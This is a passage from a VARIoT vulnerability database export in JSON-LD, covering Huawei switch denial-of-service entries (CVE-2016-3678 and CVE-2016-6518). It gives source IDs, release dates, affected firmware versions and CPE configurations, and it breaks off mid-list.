            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            db: "BID",
            id: "85731",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-04-13T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            date: "2016-04-11T00:00:00",
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            date: "2016-03-30T00:00:00",
            db: "BID",
            id: "85731",
         },
         {
            date: "2016-04-18T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            date: "2016-04-11T15:59:10.597000",
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            date: "2016-04-12T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-04-13T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            date: "2016-04-14T00:00:00",
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            date: "2016-03-30T00:00:00",
            db: "BID",
            id: "85731",
         },
         {
            date: "2016-04-18T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            date: "2016-04-14T20:18:10.387000",
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            date: "2016-04-12T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Quidway Denial of service in switch product software  (DoS) Vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
      trust: 0.6,
   },
}

var-201609-0096
Vulnerability from variot

Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets. The Huawei S7700, S9300, S9700, and S12700 are Huawei's intelligent routing switches. A remote denial of service vulnerability exists in several HuaweiSwitches. The following products and versions are affected: Huawei S9300 V200R001C00 , V200R003C00 , V200R005C00 , V200R006C00 , V200R008C00 , S5300 V200R001C00 , V200R002C00 , V200R003C00 , V200R005C00 , V200R005C01 , V200R005C02 , V200R006C00 , V200R007C00 , V200R008C00 , S5700 V200R001C00 , V200R001C01 , V200R002C00 , V200R003C00 , V200R003C02 , V200R005C00 , V200R006C00 , V200R008C00 , S6300 V200R001C00 , V200R002C00 , V200R003C00 , V200R005C00 , V200R005C01 , V200R005C02 , V200R008C00 , S6700 V200R001C00 , V200R001C01 , V200R002C00 , V200R003C00 , V200R008C00 , S7700 V200R001C00 , V200R002C00 , V200R003C00 , V200R005C00 , V200R006C00 , V200R008C00 , S9700 V200R001C00 , V200R001C01 , V200R002C00 , V200R003C00, V200R005C00, V200R006C00, V200R008C00, S12700 V200R005C00, V200R006C00, V200R008C00

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0096",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9300",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 2.4,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c01",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r006c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r001c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r006c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r006c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r001c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c02",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r002c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c02",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r006c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c01",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c02",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r006c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r001c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r006c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008c00",
            scope: null,
            trust: 0.9,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r002c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r003sph019",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r003sph019",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r003sph019",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r005sph012",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r005c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005sph012",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300li v200r003sph011",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003sph019",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "v200r008sph005",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: "7700",
         },
         {
            model: "v200r003sph019",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: "7700",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-08070",
         },
         {
            db: "BID",
            id: "92968",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-005041",
         },
         {
            db: "NVD",
            id: "CVE-2016-6518",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201609-365",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
